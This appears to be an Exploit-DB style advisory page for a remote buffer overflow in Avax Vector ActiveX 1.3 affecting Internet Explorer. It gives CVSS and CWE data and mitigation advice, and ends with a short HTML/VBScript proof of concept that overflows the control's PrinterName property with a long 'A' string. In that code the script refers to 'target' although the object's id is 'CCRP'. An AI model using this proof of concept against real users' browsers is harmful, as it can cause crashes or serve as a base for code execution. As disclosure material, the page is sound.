header-logo
Suggest Exploit
vendor:
Vector ActiveX
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Vector ActiveX
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: avax.vector.activex
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer
2008

Avax Vector Remote Buffer Overflow Vulnerability

Avax Vector is prone to a remote buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code within the context of an application that uses the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition. An example exploit code is provided in the description.

Mitigation:

Users should avoid visiting untrusted websites and should disable ActiveX controls in their web browser.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/35583/info

Avax Vector is prone to a remote buffer-overflow vulnerability.

Attackers can exploit this issue to execute arbitrary code within the context of an application that uses the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition.

Avax Vector ActiveX 1.3 is vulnerable; other versions may also be affected. 

<html>
<object classid='clsid:9589AEC9-1C2D-4428-B7E8-63B39D356F9C' id='CCRP' ></object>
<script language='vbscript'>

argCount   = 1

arg1=String(10260, "A")

target.PrinterName = arg1

</script>

<script language='javascript'>
 document.location.reload()
</script>